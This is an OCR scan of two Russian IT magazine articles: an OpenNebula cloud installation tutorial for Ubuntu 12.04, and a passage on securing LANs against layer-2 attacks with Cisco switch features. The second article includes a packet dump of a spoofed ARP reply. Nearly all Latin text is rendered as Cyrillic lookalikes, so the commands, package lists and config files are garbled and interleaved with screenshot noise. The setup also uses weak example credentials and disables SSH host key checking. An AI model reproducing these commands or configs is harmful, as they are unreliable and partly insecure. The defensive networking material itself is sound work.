Колыбель облаков 
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Окно ВазпБоага в ОрепМебща Зип${опе 


Облачную среду ОрепМеб\ща могут совместно использовать несколько 
организаций или групп пользователей с делегированием полномочий и на- 
стройкой квот. Поддерживается несколько типов учетных записей со своими 
привилегиями. Все это позволяет создать гибкую адаптируемую и управля- 
емую инфраструктуру, в которой все получают доступ только к отведенным 
ресурсам и функциям управления. 

Собственно для администрирования физических и виртуальных систем 
предложены утилиты командной строки (начинаются на опе” — опемт, 
опепо$Т, опеизег и так далее) и веб-интерфейсы ОрепМебца Зипзтопе (адми- 
нистрирование с!оца-окружений) и ОрепМеб\а Гопе$ (управление зонами). 

Возможности веб-консоли позволяют развернуть УМ, подключиться 
кним по \МС, управлять хранилищами, образами, сетями и так далее. Разра- 
ботчиками предложен сервис ОрепМебца Магкер!асе, позволяющий просто 
устанавливать преднастроенные виртуальные окружения, подготовленные 
в рамках проекта. Для мониторинга работы серверов в Зип{юопе интегриро- 
вана система Саподйа (чапойа.зТ.пе®. Кроме того, возможности ОрепМебуа 
расширяются при помощи модулей и аддонов. Например, ОрепМебцаАрр$ 
представляет собой еще один слой, позволяющий на основе ОрепМеб\а по- 
строить Раа$ (Р!аМогт а$ а Зегмсе). 

Обычные пользователи управляют своими системами через веб-портал 
ОрепМебца 5е!-Зегмсе или посредством консольных команд (осс!-*), кото- 
рые, по сути, являются надстройками над интерфейсом ОС (Ореп Сюца 
Сотрийпа птетасе). Веб-консоли на данный момент локализованы частич- 
но, хотя проблем в использовании это не вызывает. 


УСТАНОВКА ОРЕММЕВОТАВОВИОИМТО 12.04 11$ 
На момент написания этих строк последней является версия 3.8.3 (Тммп уеф®, 
вышедшая в январе 2013 года. В этом релизе появились новые драйверы 
\/Мм/аге, различные усовершенствования в ЕС2- и ОСС!-интерфейсе, управ- 
лении состоянием \М, работе гипервизора К\М и многое другое. Проект 
предлагает набор образов для виртуальных машин Соца Запарох, позво- 
ляющих быстро развернуть управляющий сервер, оценить работу и доступ 
к демооблаку. Подготовлены пакеты для самостоятельной установки на хб4- 
версии Убити, Бефап, орепЗ ИЕ и ВНЕ/СетоО$5. Возможна установка из ис- 
ходных текстов и на другие дистрибутивы Ипих. 

Нужные пакеты доступны в официальных репозиториях дистрибутивов, 
но, как правило, их версии сильно запаздывают. Например, в Убити ситуа- 
ция сейчас такая: 


$ зи4о ар&-сасйе °Иом ореппеби1а | эгер -1 мег$1оп 
Мег51оп: 3.2.1-2 


Процесс развертывания управляющего сервера не выглядит запутан- 
ным, и при должной внимательности сюрпризов не возникает. Установку 
собственно Убити и гипервизоров расписывать не буду, эти вопросы уже 
хорошо освещены. 

Хранилище образов в ОрепМеб\а находится в каталоге /маг/ИБ/опе/ 
птаде$. Лучше под него отвести отдельный раздел или диск, чтобы в после- 
дующем не беспокоиться о наличии свободного места. Имена всех узлов 
должны разрешаться через службу ОМ$. Для управления сетью на хостах нам 
потребуется мост. Ставим пакет Бмаде-и\$ и Ореп55Н-сервер, который по- 
надобится для удаленного управления: 
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$ зидо арЕ-вее 1п$5$%а11 Бг1а2е-и+11$ ореп$$Н-зегуег 


Теперь настраиваем. 


$ зиао папо /ефс/пефмогК/1пег+асе$ 


аифо го 

1Расе 6г@ 1пеЕ $%аЕ1с 
аааге$5 192.168.1.111 
пефта$К 255.255.255.0 
пефмогк 192.168.1.0 
бгоааса${ 192.168.1.255 

о ирацейнау 192, 16 

Бг1аве_рогЕ5 ефй@ 

Бг1аве_+а 9 

6г1аёе_пе11о 2 

6г1А5е_тахазде 12 

Бг1аве_5Ер о++ 


Если сетевых карт несколько, то настройки для каждой аналогичны. Пере- 
запускаем сетевой сервис и проверяем: 


$ зиао зегу1се пеемогКк1пя гезфаг* 
$ БгсЕ1 $Пом 
го 8000.000с2959428е по еёп@ 


Ставим пакеты, необходимые для работы ОрепМебша: 


$ зи4о ар*-веЕ 1п5%а11 Би11а-еззеп1а1 свгоир-11%е «= 
сгаск116-гип{1те сиг] аркКё-деу ебТаб1ез 5++ в++-4.6 «+ 
11Ба150г1%Ит-91++-рег1 11Ба1ог1ЕИт-4911-х$-рег1 «= 
11Ба150г1%Ит-тегбе-рег1 11Баррагтог1 116сгаск2 «= 
11Барк=-рег1 116ту$491с11еп{18 11Бпита1 116рд5 «= 
116геа911пе5 116гибу1.8 1165{ас++6-4.6-4е\и 116\у1гЕ-Б1п += 
116\1гЕ0 116хепзфогез.@0 116хт12-и{11$ 116хт1ирс-с++4 += 
116хт1грс-соге-с3 му$491-соттоп гибу гибу-ааетоп$ «= 
гибу-еуептасй1пе гибу-)зоп гибу-туза1 гибу-поКо51г1 «= 
гибу-раз5мога гибу-р гибу-гаск гиБу-5зедие1 ‹= 
гибу -зеаче1-рё гибу-$1пафга гибу-$911%е3 гиБу-{егт10$ += 
гибу-+11% гибу1.8 гибу1.8-аеу гибузет$ ЕИ1п {1111.8 


Проект развивается, каждая версия требует новых зависимостей, по- 
этому список не окончательный и постоянно меняется. Можно поступить 
иначе: вначале установить пакеты ОрепМебща, а затем выполнить «ар-де 
пай -Р›. Настраиваем МЕ$, который используется для раздачи образов 
и настроек. 


$ зиао папо /ефс/ехрог*$ 
/№аг/116/опе 192.168.1.0/24 (гм, зупс ‚ по_зибгее_сПеск, «= 
по_гоо*_5аца$И , апопи14=10000 , апоп=14=10000) 


# и перезапускаем сервер 
$ сиао зегу1се п+$-Кегпе1-зегуег заге 


Все готово для установки ОрепМерби. Заходим на Чо\м/поа4$.ореппебща. 
ога, выбираем и скачиваем пакет под Убищи 12.04. Внутри архива несколько 
деб-пакетов (ранее использовался один файл), ставим все: 


6 оп Мебиа былое х 


<. с юсатоя = 
Орепмехлла Месоте опездитит | 5Нп 04 
рнны и * Орепмебша Магкеф!асе 2 
Эпом 10 * епемз оо / ное собетев 5 Г. 
М мпе - рбйелич - м Агсп 8 Ноттьм 
Се0$ Зегиее 6.2 - кит Офрюетчебкка сгу кум «16 64 Гл 
Пуфлих . Кут Оремебцаото  КУМ 86 64 ГА 
ПО ЕЯ прин ие нео 1 
СетО 5 беги 6.2 + УМмиме С126 Цабе УМУАКЕ ж85 64 ут 
Публых › У\уииме С126 45 УМУТАКЕ 635 уток 
СееС Зегиее 5.1 - хоп САС цавв жм «6 64 Гав 
Песка 5дрыюеге . кеп С126 Габе ХЕМ х86 64 Г 
Орви Зет 12.1 С126 ца Ем х8б 64 Гору 
и баги 12.04 (Роско Радой) С126 16% ХЕМ 96 64 саы 
Бескал Зорюеге , Кут С126 5 кум 86 64 та 
Зисммио 1 № 10 0ё 19 епее 2 Мам ам 


В ОрепМебц!а Магке{Р!асе доступны готовые образы виртуальных машин 


125 5УМ/АСК 


У 


"Теги гай 


Ре ЕШИ Мы ЗезсН Тегтильй Нар 


опеаби1п@усег -тасв1ле - $ саё /маг/1ор/опе/опед, Тор 
ед Маг 27 15:37:40 2013 [ОНЕ][Т]: Зеаг1штр ОрепМебу1а 3.8.3 


ПАТАЗТОЯЕ ГОСАТТОН=/ маг / 116 /опе//датазТтоге$ 


ОБ=ВАСКЕМО=54а11те 

ОЕВИб ТЕМЕ! =3 
ОЕРАЦЕТ_ОЕМТСЕ_РВЕРТХ=ВЯ 
ФОЕРАЦЕТ_ТМАБЕ_Т\РЕ=05 
ЕМАВЕЕ_ОТНЕВ_РЕВМТ55ТОН5=\Е5 
НМ_МАО="ЕХЕСИТАВЕЕ=опе_Вт 
НОЗТ_МОНТТОРТНо_ЕХРТААТТОН_ТТМЕ=86400 
НО5Т_МОМТТОВТМ6_ТМТЕЙРМА| =600 
НО$Т_РЕВ_ТНТЕРМАЕ=15 

ТМАСЕ_ВЕЗТЕАТСТЕВ _АТТА=5ОЦАСЕ 
ТМ_МАБ=АРСОМЕНТ5=-г 0 -Е 15 Кум, ЕХЕСИТАВЕЕ=опе_1т_$5Н, НАМЕ=1и_Куп 
МАС_РВЕЕ1Х=02 :00 

МАМАСЕВ ТТМЕВ=15 

МЕТМОВК_512Е=254 

РОЕТ=2633 
БСАТРТ5_РЕМОТЕ_ОТВ=/маг/+тр/опе 
СЕЗЗТОМ_ЕХРТВАТТОМ ТТМЕ=900 


Ш 
УМ_МОНТТОЕТН_ЕХРТААТТОН_Т1МЕ=86400 
У\М_РЕЯ_ТМТЕВУА =5 

УМ_РОЕ-ТА6_ТМТЕРУА=600 


Просмотрев журналы, можно получить информацию по настройкам ОрепМебщаи ошибкам 


$ Еаг хиу+ Убипжи-12.04-ореппеби1а-3.8.3.аг.57 
$ с ореппеБи1а-3.8.3 
$ зидо арке -1 *.аеБ 


Для работы нам понадобится база Муз@О(: 


$ зи4ао ар*-вее 1п${а11 ту$а1-зегуег 

$ му$а1 -и гоо{ -р 

тУза1> СКЕАТЕ У5ЗЕК 'опеадт1 п" @'1оса1По$%" <“ 
ТОЕМТТЕТЕО ВУ 'опеадт1п'; 

ту5а1> СВЕАТЕ ОАТАВАЗЕ ореппеБи]1а; 

ту5$91> СКАМТ АЁЕЕ РКТУТЕЕСЕ$ ОМ ореппеби1а.* «= 
ТО ‘'опеадт1п' ТОЕМТТЕТЕО ВУ 'опеадм1п'; 

мУ$а1> ач1*; 


Настройки сервера хранятся в /ес/опе/опеа.сот, в нем содержится 
много разных параметров, но сейчас нас интересует подключение к базе 
данных: 


$ сиао папо /ефс/опе/опеа. соп+ 


ОВ = [ 
Баскепа = "ту$91", 
зегуег = "1Тоса1По$*", 
роге = 3366, 
изег = "опеаат1т", 
рама = "опеаам1т", 
АБ_пате = "ореппеби1Та" 
] 


ПОЛИТИКИ РАЗМЕЩЕНИЯ \М 


Планировщик ОрепМеб\а при размещении новой \М руководствуется 
установками политик (Ваа Сещег Расетет Ройс!е5$), которые указывают- 
ся в /&с/опеад/зспеда.соп?. По умолчанию используется политика расктод, 
при которой задействуется минимальное число серверов, что обеспечи- 
вает минимальную фрагментацию (переменная ВУММИМ С _\М5$). Политика 
зирта (-РУММИМС_\М5$) указывает на равномерное распределение УМ 

по имеющимся серверам, это гарантирует максимально доступное количе- 
ство ресурсов. Установка |оа4-а\м/аге укажет на необходимость размещения 
\УМ на сервере с минимальной нагрузкой (ЕВЕЕ_СРИ). Политика сизют 
для размещения использует вычисляемый вес (гапкК), который админ 
может настроить самостоятельно (по умолчанию формула НУММИМС _\М$ * 
59+ ЕВЕЕ-СРО). 


АЦТН_МАО=АУТНН=55А,х509, 19ар, 5егуег_с1рИАег , зегуег_х509,ЕХЕСУТАВЕЕ=оПе_зитА_тад 


САТАЗТОНЕ_МАО"АРСИМЕКТ5 =-& 15 -9 15, мтиаге, ут 5 ‚15051, | мт, ЕХЕСИТАВГЕ "топе _дафазфоге 


ТМ_МАС=АВОИМЕМТ$ =-{ 15 -9 дитту, ]1ут, $Пагед, дсом2 , 55, мт? 5,1551, ЕХЕСИТАВЕЕ=опе_1+т 
УМ МАБС=АРСИМЕМТЕ =-Т 15 -г 0 Кум, СЕРА Т=утт ехес/утт_ехес_Кут. сопТ, ЕХЕСИТАВТЕ =опе утт_ехес, $ <иао -и опеаат1п °<°Ий-Кеуреп 
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НАСТРОЙКАОКРУЖЕНИЯ 
В процессе установки аеб-пакетов создается учетная за- 
пись и группа опеаатт, от имени которых и будут запуще- 
ны процессы. Также некоторые команды в консоли следует 
выполнять исключительно от имени опеаатт. На сервере 
управления для удобства работы лучше задать пароль «з5и4о 
раз$мА опеаатт», на хостах можно использовать «5идо -и 
опеаатт». 

Аналогичную учетку нужно создать и на остальных хостах, 
причем 10 везде должен быть одинаков. Проверяем: 


$ 14 опеаат1пт 
и19=117 (опеадт1п) #14=111(с1оча) #гоир$=111 
(с1оца),129(116у1гфа) , 130 (Кут) 


Создаем на удаленном сервере группу и учетку опеадтт, 
генерируем ключ, оставляя все параметры по умолчанию: 


$ зидо вгоираада -= 111 опеадт1п 
$ зидо изегад4 -и 117 -т опеадт1п -9 /маг/116/*= 
опе/ -5 /61п/БазН -5 опеадт1п 


Чтобы сервер управления мог подключаться к хостам 
по ЭЗН без пароля, копируем ключи и создаем -/.5$П/сопйд. 


$ зи опеадм1пт 
$ саЕ -/.55И/1Аа_гза.риЬ >> -/.55И/ач{Пог1хед_Кеу$ 
$ папо -/.$$5И/сопй? 
Но * 
5Ег1сЕНо5{КеуСИеск1пй по 


После чего копируем каталог /маг/И6/опе/.$5П на каждый узел и подключаем- 
ся, чтобы проверить, что соединение происходит без запроса пароля. 

Файлы для авторизации должны располагаться в подкаталоге -/.опе, его 
необходимо создать и заполнить вручную. 


$ ткатг -/.опе 


Пароль хранится в открытом виде в файле -/.опе/опе_ашп: 


$ еспо "опеаадт1т : р@$5м@9га" > -/.опе/опе_ачЕИ 
$ сптоа 600 -/.опе/опе_ач Ей 


Во время установки при помощи пакетов пароль генерируется автомати- 
чески, его нужно переопределить утилитой опецзег: 


$ опеизег раззма 9 р@$5м@га 


Аргумент «0» задает идентификатор пользователя, для опеадатт он равен 0. 
Настройки закончены, перезапускаем сервер: 


6 Орзамеиа булесеы 
<- [< юса№юо$Е 9869 


Мебнсии гуре 


Создание виртуальной сети в ОрепМебч!а Зип$Топе 
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ВИРТУАЛИЗАЦИЯ \/$ ОБЛАКО 


Сегодня в моде термин «облако». Несмотря на его раскрученность, 
многие не видят принципиального отличия виртуализации от облака 

и не понимают, где заканчивается одно и начинается другое. По сути, 
виртуализация — это гипервизор и набор инструментов управления, 
каждый разработчик предпочитает поддерживать только свой гиперви- 
зор, не позволяя управлять другими. Сам набор рассчитан на инженера, 
ане рядового пользователя. 

Платформы для построения облака предоставляют дополнительный 
уровень абстракции, позволяя не привязываться к физическому оборудо- 
ванию и использовать в единой инфраструктуре различные гипервизоры. 
Такой подход упрощает управление большими массивами и позволяет 
выделять ресурсы по необходимости. И главное, в процессе могут участво- 
вать обычные пользователи. 


$ зи опеаат1п 
$ опе $*ор 
$ опе $фаге 


Чтобы убедиться в том, что аутентификация настроена корректно, лучше 
сразу выполнить любую консольную команду. Если вывод не содержит оши- 
бок, значит, все сделано правильно. Например, список пользователей: 


$ опеизег 115+ 

ТО МАМЕ СКОУР АЧТН \М$ МЕМОВУ СРО 

9 опеаат1п опеадтм1п соге - - - 

1 зегуегадт1п опеадт1п зегуег_с - - - 


В случае проблем смотрим, что пишет журнал. Введя «са{ /магЛод/опе/ 
опе4.!09», получим листинг загруженных параметров сервера из конфига 
и сообщения о запуске элементов. Также команда «пе${а+{ -ап1› должна по- 
казать, что открыт порт 2633. 


НАСТРОЙКА ВЕБ-КОНСОЛЕЙ ЗИМ$ТОМЕ И ЗЕТЕ-ЗЕВМСЕ 

Все операции можно производить при помощи утилит командной строки 
или веб-консоли. Второй способ более нагляден и прост в использова- 
нии. Настройки Зип$юпе выполняются в /&с/опе/зип{юпте-зегуег.сопт, 
по умолчанию слушается только 1осайо${, поэтому правим: 


$ сиао папо /ефс/опе/зип$опе-зегуег. соп+ 
: №о$е: 0.0.0.0 
роге: 9869 


Остальное можно пока не трогать. Запускаем: 


си опеадм1п 
$ зипзфопе-зегуег $фаг* 


и НН 
а вая | 


В в ТЫ ть = о ыы] 


Для обычных пользователей предназначен ОрепМебц!а 5е!-Зегмсе 


729 


Тег та! = хх 
Не Еди \ем беагси Тетимта! Нер 
# |ТУЕ АЕЗСНЕО$: РегФогт 11уе (1) ог с019 т1бгат10п$ (0) утеп гезспеди11п; а УМ 


Е 


НУРЕКУТ5ОК_МЕМ: Ргаст1оп от тота1 МЕМОВУ гезегуед Тог тПе Пурегу1$0г. 
Е.р. 0.1 меап$ ТВаф оп1у 90% оф {Не Тота] МЕМОВУ м11] Бе изед 


Ы 
Ш 
ы 
й ОБРАЦСТ_$СНЕО: ОеГ1па (топ ОГ {Ме деГаш]{ зспеди]1пр а!рог Им 
# - ро11су: 
ы 0 = Раск1ия. Неиг1$11с 1Па! м1п1т1ге$ {пе питбег оГ 1051$ 1 и5е Бу 
№ раск1па тпе УМ$ 1п тНе Позт$ то гедисе УМ Тгартептат1оп 
ы 1 = ${гараие. Нешг15(1с \Та\{ {г1е$ {0 тахшт1хе гезоцгсез ауа1]а6]е Тог 

№ тне \М$ Бу $ргеад1тя тпе УМ$ 1п тНе №о$т$ 

ы 2 = Гоад-амаге. Неиг151с (Пай {г1е$ {0 тахшпёге гезоигсе$ ауа 1аЬ]е Гог 
# тНе УМ5 Бу из1п21Ло5$е подез ма1Н 1е55 10а9 

ы 3 = Сизтот. 

# - гайкК: Сизтом аг1трмет1с ехрг15$1оп то гайпк зи1таБ1е Розт$ Базед 1п тВе1г 
ы 

# 


аттг1рите$ 
линия уния я 


ЮНЕО_РОВТ = 2633 
$СНЕО_ТМТЕВМА!: = 30 
МАХ_\ММ 


МАХ_ОТСРАТСН 
МАХ_НОУТ 


ниши 
ии 
о 


"ТУЕ_ВЕЗСНЕО$ = 0 


НУРЕКУТ$ОВ_МЕМ = 0.1 


ОЕРАЦЕТ_5СНЕО = [ 
ро]1су = 1 
] 


МОЕРАЦЕТ_5СНЕО = |[ 

ы ро] 1су = 3, 

#  гапкК = "- (ВОММТЫС_УМ5 * 50 + ЕВЕЕ_СРУ)" 
#] 


Настройки политик размещения \М в $свед.соп{ 


Как видно из конфига, Зипопе использует порт 9869, к нему и подклю- 
чаемся браузером, вводя для регистрации данные опеаатт. Интерфейс 
Зипфопе прост, разобраться с основными установками будет несложно. Все 
настройки разделены на пять групп: 

. Оазйроага — общая статистика; 

. сует — настройка учетных записей пользователей, групп и АСГ; 

‚ \Мпиа Везоигсе$ — виртуальные машины, образы и шаблоны образов; 

. ПНназтииге — настройка узлов, виртуальной сети, систем хранения 

и кластеров; 

. Магкефр!асе — доступ к подготовленным образам виртуальных машин. 


По умолчанию в Зип{юпе анонимный доступ к Магкаер!асе, но если уже 
есть своя учетная запись в Магкер!асе, данные следует указать в зип юопе- 
зегуег.соп{. Доступ пользователей к \/М организован через сервис ОСС|, на- 
стройки которого находятся в /@4с/опе/осс!-зегуег.сопТ. По умолчанию здесь 
также разрешен доступ только с |1осато${, меняем: 


$ зиао папо /ефс/опе/осс1-зегуег. соп+ 
: №о$е: 0.0.0.0 
‚роге: 4567 


Остальное можно не трогать. Запускаем: 


$ осс1-зегмег $аге 


Открыв браузер на странице ПИр://ехатр!е.ога:4567/и, получим доступ 
к веб-интерфейсу ОрепМебца Зе[-Зегмсе, его возможности во многом со- 
впадают с Зипзюпе, но, естественно, их чуть меньше, и они проще. Также 
управлять своими \/М можно при помощи набора утилит осс!-*. Например, 
получим список преднастроек: 


$ осс1-1п5Фапсе-фуре 115% 


Аналогично активируется сервис ОрепМебща Гопез$, настройки которого 
прописаны в /@с/опе/отопез-зегуег.соп?. Кроме того, потребуется создать 
базу данных о7опез$. Далее запускаем отопез-зегуег Чай. По умолчанию под- 
ключение производится к порту 6121. 


ЗАКЛЮЧЕНИЕ 

Знакомство с проектом ОрепМеб\ща показало, что это простой и удобный 
инструмент для развертывания |1аа$-сервиса с возможностью делегиро- 
вания полномочий разным пользователям. Настройки каждого компонента 
ОрепМеб\а хорошо документированы, поэтому при возникновении проблем 
найти причину не составит особого труда. = 
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ЗАЩИТА 
ВНУТРИ 
ПЕРИМЕТРА 


ОБЕСПЕЧЕНИЕ БЕЗОПАСНОСТИ КАНАЛЬНОГО 
УРОВНЯ СРЕДСТВАМИ КОММУТАТОРОВ С($СО 


А 


Локалка стала доставлять много хлопот? Пользователи получают о ЩИ 
левые айпишники по ОНСР? Красноглазые пионеры балуются спу- 

фингом? Всю сеть время от времени штормит? Пора изучать матчасть 

и настраивать фирменный коммутатор! 


ВМЮОЗНИВ @ Нскгсом 
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При Ш Сгеае АСЬ п - | 


Г АСЬ ТибогтаНоп 


| АСЬ Туре: Ех+епдед ТР ый 
| АСЕ Мате/митье 102 |] 
МАС Ехеп Е 


Ш Сгеаее АСЕ - Ежепдед 


ГАСЬ Туре: Ежепдед ТР 


Кеумогд: 
ое ргофосо [90-255] | ] 
од: Мо 129099 
Ррово со! орбопе.., 


Ргеседепсе: попе й - 
Туре оЁ Зегмсе: [попе "| 
СезбпаНоп А99ге55: 

Сошгсе Атаки 
СезНпаноп МИЭсагд: 

Зоигсе \МИасага: 0.0.0.255 м 


те Вапде: 


Сапсе! Нер 


СЪСР: 


НОВОЕ — ЗАБЫТОЕ СТАРОЕ К 

Как ни банально звучит, но канальный уровень — это крае- Создание АСЕ в СМА 
угольный камень безопасности компьютерной сети. Принципы 

работы коммутаторов Епегте, а также протоколы АЕР и ОНСР 7 

использующие широковещательные рассылки, разработаны Интерфейс С!зсо 
много лет назад. В основе этих подходов — доверие участников МегмогКк Аз! фтап{ 


сетевых взаимодействий друг к другу, что в сегодняшних реа- 
лиях неприемлемо. Атаковать узлы и/или нарушить работоспо- 
собность локальной сети, построенной на основе неуправляе- 
мых свитчей, — проще простого. 

С незапамятных времен известны такие атаки, как пере- 
полнение таблицы МАС-адресов (САМ-таблицы) коммутатора 
(МАС-флудинг) и различные способы подмены МАС-адресов 
(МАС-спуфинг и АВР-спуфинг). Примечательно, что большин- 
ство классических атак канального уровня основано не на ка- 
ких-либо уязвимостях, а на вполне стандартном поведении 
сетевых стеков современных операционных систем. Так, чтобы 
вмешаться в ход взаимодействия двух узлов, достаточно отпра- 
вить одному из них соответствующий АНР-пакет (третья строка 
дампа трафика): 


20:36:04.674993 08:00:27:53:1е:3е > 
9а:00:27:00:00:00, еЕпегфуре ТР\у4 (0х0800), «+ 
1еп5еИ 98: 

192.168.56.101 > 192.168.56.1: ТСМР есПо «= 
гедие$*, 14 801, °еа 11, Тепвёей 64 


20:36:04.675033 @а:00:27:00:00:00 > 
08:00:27:53:1е:3е, ефпегфуре ТР\у4 (0х0800), «= 
1еп5еИ 98: 

192.168.56.1 > 192.168.56.101: ТСМР еспо гер1у, «“ 
14 801, еда 11, 1епрЕИ 64 


20:36:05.468048 01:01:01:01:01:01 › 
ЕЕ: РЕ: ЕЕ: ЕЕ: ЕЕ:Р+, ефиегфуре АВР (0х0806), «= 
1еп5ЕИ 42: 


| Рае 


№ Сыну 22 бегика 


|= срнегя 


| ‚ 55 пошывноо | 


тира 


СОРАИЕТЕЕТГТАРЕЛТ ИЕ ИН 


ПА ЧАЕМ Ее ЕТ У АА ЕЕ ЖЕНЕ 


г ем 


Еннегспалиыы... 
| беду 


пасе Мег. .- 
Раз Свои 


все... 


ВОМР згорилу.., 

фоикеа ман... 

Рголесед Рог. 

РАМ... - 

Арюодето Сопёгой,, 
№ бантее Ргорегы ая 


Кацпён Свисс Мапывуистнеги... 
Бане Саебниеалияи. 


Е бам 


Как же противостоять угрозам канального уровня? Это 
сложный вопрос. Но очевидно, что первый рубеж защиты при- 
ходится на уровень доступа к сетевой инфраструктуре. А основ- 
ной инструмент борьбы со злом — управляемый коммутатор. 


НЕСТРАШНЫ НАМ ШТОРМА 

Для простейшей проверки того, насколько безопасна локаль- 
ная сеть, достаточно... патчкорда. Им необходимо соединить 
две ближайшие розетки Ететет. Если защита не совсем хо- 
роша, то созданная таким нехитрым способом петля вызовет 
лавинный рост широковещательного трафика. Пропускная спо- 
собность сети резко упадет, а то и вовсе ее работа будет пара- 
лизована. 

Между тем коммутаторы С!5со позволяют эффективно кон- 
тролировать широковещательный (Бгоаасаз$1), многоадресный 
(пти@са${) или одноадресный (итса${) трафик. Например, ис- 
пользуя консоль, настроим устройство для борьбы с широко- 
вещательным штормом. Сначала войдем в режим конфигури- 
рования: 


# сое Е 


Потом переключимся в режим конфигурирования интер- 
фейса (например, ддабце апете{ 0/1) и введем две команды: 


(сопЯ8)# 1пЕ 21 0/1 
(сопй-1+)# $Жогт-сопфго1 Бгоааса$Е 1е\уе1 20.00 


(сопй-1+)# зЕогт-сопЕго1 асЕ1Топ $НиЕаомт 


Первая команда устанавливает максимальный уровень 
широковещательного трафика в 20 процентов от полосы про- 
пускания. Порог можно устанавливать не только в процентах, 
но и в битах в секунду (6р5). 


Вер1у 192.168.56.1 1$-а® 01:01:01:01:01:01, «= Дополнительные функции 


Тепев 28 НЕ КОНСОЛЬЮ ЕДИНОЙ СИЛЬНА С1$60 


20:36:05.685509 08:00:27:53:1е:3е › 
01:01:01:01:01:01, ефпегфуре ТРу\у4 (0х0800 
1еп5еИ 98: 

192.168.56.101 > 192.168.56.1: ТСМР есПо += 
гедие$*, 14 801, °еа 12, 1епвёей 64 


Сегментация сети как метод защиты снимает часть про- 
блем, но порождает другие угрозы. Классикой уже успели стать 
различные техники, применяемые против виртуальных локаль- 
ных сетей (УтАМ): УГАМ-Порртод, нелегальный О-т-0 и подоб- 
ные. Служебные протоколы (ЗТР, СОР ОТР) также успешно экс- 
плуатируются для получения информации о сети и реализации 
некоторых видов атак. 


Использование интерфейса командной строки для управления 
коммутатором — чаще дело привычки, чем необходимость. 
Большинство рутинных операций в небольшой сети можно 
автоматизировать с помощью бесплатной фирменной утилиты 
С15со Мемогк Азат (СМА, БИ.[у/тгРРх). Она доступна 

для МММпаом$ и ОЗ Х. Максимальное количество управляемых 
устройств (коммутаторов, маршрутизаторов, беспроводных 
точек доступа) — 40. Ее интуитивный графический интерфейс 
позволяет решать основные задачи настройки, инвентари- 
зации, оповещения о событиях, управления файлами и про- 
граммным обеспечением оборудования. 


132 $УМ/АСК 


ШЕсо49т9 Сопьто| 


`РазЕфегпео/1 


а ааа Враны я 
РЕНИ азота /3 


| Еа5\ЕНегпе! 0/5 
| Ра5Еегпе 0/6 
 РазЕегие 0/7 
| РазЕегпе\0/8  тасфуе ^ 


Тоёа| Вом$: 50 


—) | Уррег Ц: [20 .00 
в ро ‚00 


Арр!у Регезв Сапсе! нер 


Вторая команда определяет, какое действие должно быть 
совершено, когда лимит будет достигнут, — отключить порт 
(зи аом/п). Если действие не указывать, то свитч будет просто 
фильтровать трафик, превышающий порог, и не отправлять ни- 
каких оповещений. ЭММР-трапы и сообщения в Зузюд можно 
включить, если указать асйоп гар. 

Чтобы в этом примере коммутатор автоматически восста- 
навливал порт, скажем, через 5 минут (равно 300 секунд) по- 
сле отключения, нужно в глобальной конфигурации дать такие 
команды: 


# егг15аб1е гесоуегу сачзе $огт-соп*го1 
# егг15аб1е гесоуегу 1пфегуа1 300 


Можно в огоаасаз 1еуе! указать два порога. Тогда при дости- 
жении первого порт будет отключаться, при падении огоааса${- 
трафика до уровня второго — включаться: 


(сопй8-1+)# $зКогт-сопго1 Бгоадса$* 1е\ме1 20.00 5.00 


У коммутаторов С!5со есть также штатное средство об- 
наружения петель, основанное на периодической отправке 
Кеера!ме-сообщений. Эта опция обычно включена по умолча- 
нию, и в случае срабатывания порт отключается. Для механиз- 
ма Кеерайуе можно также настроить автоматическое включение 
интерфейса: 


# егг15аб1е гесоуегу саизе ТоорБаск 


$ТРПОД ПРИЦЕЛОМ 

Еще одним средством борьбы с петлями в сети является прото- 
кол ЭТР. Кроме того, ЭТР позволяет обеспечить дублирование 
линий передачи и, соответственно, отказоустойчивость. Все 
это хорошо, но излишняя толерантность конфигурации комму- 
татора приводит к плачевным последствиям: злоумышленник 
может манипулировать приоритетами с помощью параметров 
ВРВОЧУ-пакетов. 


^ 


Управление широко- 
вещательными штор- 
мамив СМА 


7 
Настройка Рог{ ЗесигКу 
наинтерфейсев СМА 


У коммутаторов С!5со есть также 
штатное средство обнаружения петель, 
основанное на периодической отправке 
КеераПуе-сообщений. Эта опция обычно 


включена по умолчанию 
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= Мо4Ну Рог{ $есигИу 


Ра0/37 


Тег Расе: 
Зесийу Заз: |ЕпаЫе4 


| 5ску Венамюг: 
| Махитит Аддге$$ Соип1-8192): | 
| Моаноп АсНоп: > 
Ада Экафис: 

Адта Тите(1-1440 птще$): 


Ада Туре: 


Чтобы пресечь это зло на корню, делаем следующее. Во- 
первых, чтобы все работало быстрее, устанавливаем режим 
рог{а$+ на портах, к которым подключены рабочие станции: 


# 11% гапёе Фа 09/1 - 48 
(сопйй-1+-гапге)# зрапп1п-%гее рогЕФа$* 


И в глобальной конфигурации настраиваем роа${-порты 
так, чтобы при появлении ВРВУ-пакета порт отключался (там их 
не должно быть в принципе): 


# зрапп1п-гее рога Браувчага ае+ачи1* 


Во-вторых, защищаем Восо{ Впацще. Для этого на магистраль- 
ном интерфейсе выполняем команду: 


(сопЯ8-1+Р)# зрапп1п-Егее виаг гоо* 


ЗАЩИЩАЕМ ОНСР 

Использование в большой (или плохо контролируемой) сети 
ОНСР-сервера для настройки протокола 1Р на узлах — это по- 
стоянный источник проблем для системного администратора. 
По иронии часто эти проблемы связаны не со злоумышленной 
активностью, а с деятельностью нерадивых пользователей. 
Почти классический пример — самовольное подключение 
к сети устройства с включенным ОНСР-сервером, который 
наперегонки с легитимным сервером начинает раздавать |Р- 
адреса рабочим станциям. Чей ОНСР-ответ дойдет до клиента, 
того и адрес он себе поставит. 

Функция коммутатора, которая предназначена для защиты 
от ОНСР-атак, называется ОНСР зпоорто. Ее основу состав- 
ляет классификация всех портов на доверенные ({ги${) и нена- 
дежные (итги${). Принципиальная разница в том, что с первых 
транслируются ответы ОНСР-сервера, а со вторых — нет. 

Итак, большую часть вопросов можно снять, включив ОНСР 
эпоорта на коммутаторе и объявив доверенным тот порт, к ко- 
торому подключен ОНСР-сервер. Для этого нужно в режиме 
глобальной конфигурации выполнить следующие команды 
(вторая команда указывает, для каких УЁАМ включается опция 
защиты ОНСР): 


# 1р АПср зпоойпв 
# 1р АПср-зпоор1п5 \1ап 2 


В настройках порта, к которому подключен ОНСР-сервер, ука- 
зать: 


(сопЯй-1+)# 1р Айср зпоор1пё Еги$Е 
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Ненадежные порты настраивать отдельно нет необходимости — они таковыми счи- 
таются по умолчанию. 

Кстати, в качестве бонуса сразу после активизации ОНСР зпоортда включается 
проверка МАС-адреса источника на итги${-портах (уе!Ру тас-адаге$$): если адре- 
